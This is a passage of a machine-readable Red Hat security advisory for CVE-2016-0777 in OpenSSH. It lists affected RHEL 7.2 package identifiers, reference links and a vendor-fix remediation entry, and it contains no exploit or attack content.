"7Server-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.s390x", "7Server-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.x86_64", "7Server-optional-7.2.Z:openssh-0:6.6.1p1-23.el7_2.ppc64", "7Server-optional-7.2.Z:openssh-0:6.6.1p1-23.el7_2.ppc64le", "7Server-optional-7.2.Z:openssh-0:6.6.1p1-23.el7_2.s390x", "7Server-optional-7.2.Z:openssh-0:6.6.1p1-23.el7_2.src", "7Server-optional-7.2.Z:openssh-0:6.6.1p1-23.el7_2.x86_64", "7Server-optional-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.ppc64", "7Server-optional-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.ppc64le", "7Server-optional-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.s390x", "7Server-optional-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.x86_64", "7Server-optional-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.ppc64", "7Server-optional-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.ppc64le", "7Server-optional-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.s390x", "7Server-optional-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.x86_64", "7Server-optional-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.i686", "7Server-optional-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc", "7Server-optional-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc64", "7Server-optional-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc64le", "7Server-optional-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.s390", "7Server-optional-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.s390x", "7Server-optional-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.x86_64", "7Server-optional-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.ppc64", "7Server-optional-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.ppc64le", "7Server-optional-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.s390x", "7Server-optional-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.x86_64", "7Server-optional-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.ppc64", "7Server-optional-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.ppc64le", "7Server-optional-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.s390x", "7Server-optional-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.x86_64", "7Server-optional-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.ppc64", "7Server-optional-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.ppc64le", "7Server-optional-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.s390x", "7Server-optional-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.x86_64", "7Server-optional-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.ppc64", "7Server-optional-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.ppc64le", "7Server-optional-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.s390x", "7Server-optional-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.x86_64", "7Server-optional-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.i686", "7Server-optional-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc", "7Server-optional-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc64", "7Server-optional-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc64le", "7Server-optional-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.s390", "7Server-optional-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.s390x", "7Server-optional-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.x86_64", "7Workstation-7.2.Z:openssh-0:6.6.1p1-23.el7_2.ppc64", "7Workstation-7.2.Z:openssh-0:6.6.1p1-23.el7_2.ppc64le", "7Workstation-7.2.Z:openssh-0:6.6.1p1-23.el7_2.s390x", "7Workstation-7.2.Z:openssh-0:6.6.1p1-23.el7_2.src", "7Workstation-7.2.Z:openssh-0:6.6.1p1-23.el7_2.x86_64", "7Workstation-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.ppc64", "7Workstation-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.ppc64le", "7Workstation-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.s390x", "7Workstation-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.x86_64", "7Workstation-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.ppc64", "7Workstation-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.ppc64le", "7Workstation-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.s390x", "7Workstation-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.x86_64", "7Workstation-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.i686", "7Workstation-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc", "7Workstation-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc64", "7Workstation-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc64le", "7Workstation-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.s390", "7Workstation-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.s390x", "7Workstation-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.x86_64", "7Workstation-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.ppc64", "7Workstation-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.ppc64le", "7Workstation-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.s390x", "7Workstation-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.x86_64", "7Workstation-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.ppc64", "7Workstation-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.ppc64le", "7Workstation-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.s390x", "7Workstation-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.x86_64", "7Workstation-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.ppc64", "7Workstation-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.ppc64le", "7Workstation-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.s390x", "7Workstation-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.x86_64", "7Workstation-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.ppc64", "7Workstation-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.ppc64le", "7Workstation-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.s390x", "7Workstation-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.x86_64", "7Workstation-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.i686", "7Workstation-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc", "7Workstation-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc64", "7Workstation-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc64le", "7Workstation-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.s390", "7Workstation-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.s390x", "7Workstation-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.x86_64", "7Workstation-optional-7.2.Z:openssh-0:6.6.1p1-23.el7_2.ppc64", "7Workstation-optional-7.2.Z:openssh-0:6.6.1p1-23.el7_2.ppc64le", "7Workstation-optional-7.2.Z:openssh-0:6.6.1p1-23.el7_2.s390x", "7Workstation-optional-7.2.Z:openssh-0:6.6.1p1-23.el7_2.src", "7Workstation-optional-7.2.Z:openssh-0:6.6.1p1-23.el7_2.x86_64", "7Workstation-optional-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.ppc64", "7Workstation-optional-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.ppc64le", "7Workstation-optional-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.s390x", "7Workstation-optional-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.x86_64", "7Workstation-optional-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.ppc64", "7Workstation-optional-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.ppc64le", "7Workstation-optional-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.s390x", "7Workstation-optional-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.x86_64", "7Workstation-optional-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.i686", "7Workstation-optional-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc", "7Workstation-optional-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc64", "7Workstation-optional-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc64le", "7Workstation-optional-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.s390", "7Workstation-optional-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.s390x", "7Workstation-optional-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.x86_64", "7Workstation-optional-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.ppc64", "7Workstation-optional-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.ppc64le", "7Workstation-optional-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.s390x", "7Workstation-optional-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.x86_64", "7Workstation-optional-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.ppc64", "7Workstation-optional-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.ppc64le", "7Workstation-optional-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.s390x", "7Workstation-optional-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.x86_64", "7Workstation-optional-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.ppc64", "7Workstation-optional-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.ppc64le", "7Workstation-optional-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.s390x", "7Workstation-optional-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.x86_64", "7Workstation-optional-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.ppc64", "7Workstation-optional-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.ppc64le", "7Workstation-optional-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.s390x", "7Workstation-optional-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.x86_64", "7Workstation-optional-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.i686", "7Workstation-optional-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc", "7Workstation-optional-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc64", "7Workstation-optional-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc64le", "7Workstation-optional-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.s390", "7Workstation-optional-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.s390x", "7Workstation-optional-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.x86_64" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2016-0777" }, { "category": "external", "summary": "RHBZ#1298032", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1298032" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2016-0777", "url": "https://www.cve.org/CVERecord?id=CVE-2016-0777" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2016-0777", "url": "https://nvd.nist.gov/vuln/detail/CVE-2016-0777" }, { "category": "external", "summary": "http://www.openssh.com/txt/release-7.1p2", "url": "http://www.openssh.com/txt/release-7.1p2" }, { "category": "external", "summary": "https://access.redhat.com/articles/2123781", "url": "https://access.redhat.com/articles/2123781" }, { "category": "external", "summary": "https://www.qualys.com/2016/01/14/cve-2016-0777-cve-2016-0778/openssh-cve-2016-0777-cve-2016-0778.txt", "url": "https://www.qualys.com/2016/01/14/cve-2016-0777-cve-2016-0778/openssh-cve-2016-0777-cve-2016-0778.txt" } ], "release_date": "2016-01-14T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2016-01-14T20:20:12+00:00", "details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", "product_ids": [ "7Client-7.2.Z:openssh-0:6.6.1p1-23.el7_2.ppc64", "7Client-7.2.Z:openssh-0:6.6.1p1-23.el7_2.ppc64le", "7Client-7.2.Z:openssh-0:6.6.1p1-23.el7_2.s390x", "7Client-7.2.Z:openssh-0:6.6.1p1-23.el7_2.src", "7Client-7.2.Z:openssh-0:6.6.1p1-23.el7_2.x86_64", "7Client-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.ppc64", "7Client-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.ppc64le", "7Client-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.s390x", "7Client-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.x86_64", "7Client-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.ppc64", "7Client-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.ppc64le", "7Client-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.s390x", "7Client-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.x86_64", "7Client-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.i686", "7Client-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc", "7Client-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc64", "7Client-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc64le", "7Client-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.s390", "7Client-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.s390x", "7Client-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.x86_64", "7Client-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.ppc64", "7Client-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.ppc64le", "7Client-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.s390x", "7Client-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.x86_64", "7Client-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.ppc64", "7Client-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.ppc64le", "7Client-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.s390x", "7Client-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.x86_64", "7Client-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.ppc64", "7Client-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.ppc64le", "7Client-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.s390x", "7Client-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.x86_64", "7Client-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.ppc64", "7Client-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.ppc64le", "7Client-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.s390x", "7Client-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.x86_64", "7Client-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.i686", "7Client-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc", "7Client-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc64", "7Client-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc64le", "7Client-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.s390", "7Client-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.s390x", "7Client-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.x86_64", "7Client-optional-7.2.Z:openssh-0:6.6.1p1-23.el7_2.ppc64", "7Client-optional-7.2.Z:openssh-0:6.6.1p1-23.el7_2.ppc64le", "7Client-optional-7.2.Z:openssh-0:6.6.1p1-23.el7_2.s390x", "7Client-optional-7.2.Z:openssh-0:6.6.1p1-23.el7_2.src", "7Client-optional-7.2.Z:openssh-0:6.6.1p1-23.el7_2.x86_64", "7Client-optional-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.ppc64", "7Client-optional-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.ppc64le", "7Client-optional-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.s390x", "7Client-optional-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.x86_64", "7Client-optional-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.ppc64", "7Client-optional-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.ppc64le", "7Client-optional-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.s390x", "7Client-optional-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.x86_64", "7Client-optional-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.i686", "7Client-optional-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc", "7Client-optional-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc64", "7Client-optional-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc64le", "7Client-optional-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.s390", "7Client-optional-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.s390x", "7Client-optional-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.x86_64", "7Client-optional-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.ppc64", "7Client-optional-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.ppc64le", "7Client-optional-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.s390x", "7Client-optional-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.x86_64", "7Client-optional-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.ppc64", "7Client-optional-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.ppc64le", "7Client-optional-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.s390x", "7Client-optional-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.x86_64", "7Client-optional-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.ppc64", "7Client-optional-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.ppc64le", "7Client-optional-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.s390x", "7Client-optional-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.x86_64", "7Client-optional-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.ppc64", "7Client-optional-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.ppc64le", "7Client-optional-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.s390x", "7Client-optional-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.x86_64", "7Client-optional-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.i686", "7Client-optional-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc", "7Client-optional-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc64", "7Client-optional-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc64le", "7Client-optional-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.s390", "7Client-optional-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.s390x", "7Client-optional-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.x86_64", "7ComputeNode-7.2.Z:openssh-0:6.6.1p1-23.el7_2.ppc64", "7ComputeNode-7.2.Z:openssh-0:6.6.1p1-23.el7_2.ppc64le", "7ComputeNode-7.2.Z:openssh-0:6.6.1p1-23.el7_2.s390x", "7ComputeNode-7.2.Z:openssh-0:6.6.1p1-23.el7_2.src", "7ComputeNode-7.2.Z:openssh-0:6.6.1p1-23.el7_2.x86_64", "7ComputeNode-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.ppc64", "7ComputeNode-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.ppc64le", "7ComputeNode-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.s390x", "7ComputeNode-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.x86_64", "7ComputeNode-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.ppc64", "7ComputeNode-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.ppc64le", "7ComputeNode-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.s390x", "7ComputeNode-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.x86_64", "7ComputeNode-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.i686", "7ComputeNode-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc", "7ComputeNode-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc64", "7ComputeNode-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc64le", "7ComputeNode-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.s390", "7ComputeNode-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.s390x", "7ComputeNode-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.x86_64", "7ComputeNode-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.ppc64", "7ComputeNode-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.ppc64le", "7ComputeNode-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.s390x", "7ComputeNode-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.x86_64", "7ComputeNode-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.ppc64", "7ComputeNode-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.ppc64le", "7ComputeNode-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.s390x", "7ComputeNode-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.x86_64", "7ComputeNode-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.ppc64", "7ComputeNode-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.ppc64le", "7ComputeNode-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.s390x", "7ComputeNode-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.x86_64", "7ComputeNode-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.ppc64", "7ComputeNode-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.ppc64le", "7ComputeNode-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.s390x", "7ComputeNode-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.x86_64", "7ComputeNode-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.i686", "7ComputeNode-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc", "7ComputeNode-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc64", "7ComputeNode-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc64le", "7ComputeNode-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.s390", "7ComputeNode-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.s390x", "7ComputeNode-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.x86_64", "7ComputeNode-optional-7.2.Z:openssh-0:6.6.1p1-23.el7_2.ppc64", "7ComputeNode-optional-7.2.Z:openssh-0:6.6.1p1-23.el7_2.ppc64le", "7ComputeNode-optional-7.2.Z:openssh-0:6.6.1p1-23.el7_2.s390x", "7ComputeNode-optional-7.2.Z:openssh-0:6.6.1p1-23.el7_2.src", "7ComputeNode-optional-7.2.Z:openssh-0:6.6.1p1-23.el7_2.x86_64", "7ComputeNode-optional-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.ppc64", "7ComputeNode-optional-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.ppc64le", "7ComputeNode-optional-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.s390x", "7ComputeNode-optional-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.x86_64", "7ComputeNode-optional-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.ppc64", "7ComputeNode-optional-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.ppc64le", "7ComputeNode-optional-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.s390x", "7ComputeNode-optional-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.x86_64", "7ComputeNode-optional-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.i686", "7ComputeNode-optional-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc", "7ComputeNode-optional-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc64", "7ComputeNode-optional-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc64le", "7ComputeNode-optional-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.s390", "7ComputeNode-optional-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.s390x", "7ComputeNode-optional-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.x86_64", "7ComputeNode-optional-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.ppc64", "7ComputeNode-optional-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.ppc64le", "7ComputeNode-optional-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.s390x", "7ComputeNode-optional-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.x86_64", "7ComputeNode-optional-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.ppc64", "7ComputeNode-optional-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.ppc64le", "7ComputeNode-optional-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.s390x", "7ComputeNode-optional-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.x86_64", "7ComputeNode-optional-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.ppc64", "7ComputeNode-optional-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.ppc64le", "7ComputeNode-optional-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.s390x", "7ComputeNode-optional-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.x86_64", "7ComputeNode-optional-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.ppc64", "7ComputeNode-optional-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.ppc64le", "7ComputeNode-optional-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.s390x", "7ComputeNode-optional-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.x86_64", "7ComputeNode-optional-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.i686", "7ComputeNode-optional-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc", "7ComputeNode-optional-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc64", "7ComputeNode-optional-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc64le", "7ComputeNode-optional-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.s390", "7ComputeNode-optional-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.s390x", "7ComputeNode-optional-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.x86_64", "7Server-7.2.Z:openssh-0:6.6.1p1-23.el7_2.ppc64", "7Server-7.2.Z:openssh-0:6.6.1p1-23.el7_2.ppc64le", "7Server-7.2.Z:openssh-0:6.6.1p1-23.el7_2.s390x", "7Server-7.2.Z:openssh-0:6.6.1p1-23.el7_2.src", "7Server-7.2.Z:openssh-0:6.6.1p1-23.el7_2.x86_64", "7Server-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.ppc64", "7Server-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.ppc64le", "7Server-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.s390x", "7Server-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.x86_64", "7Server-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.ppc64", 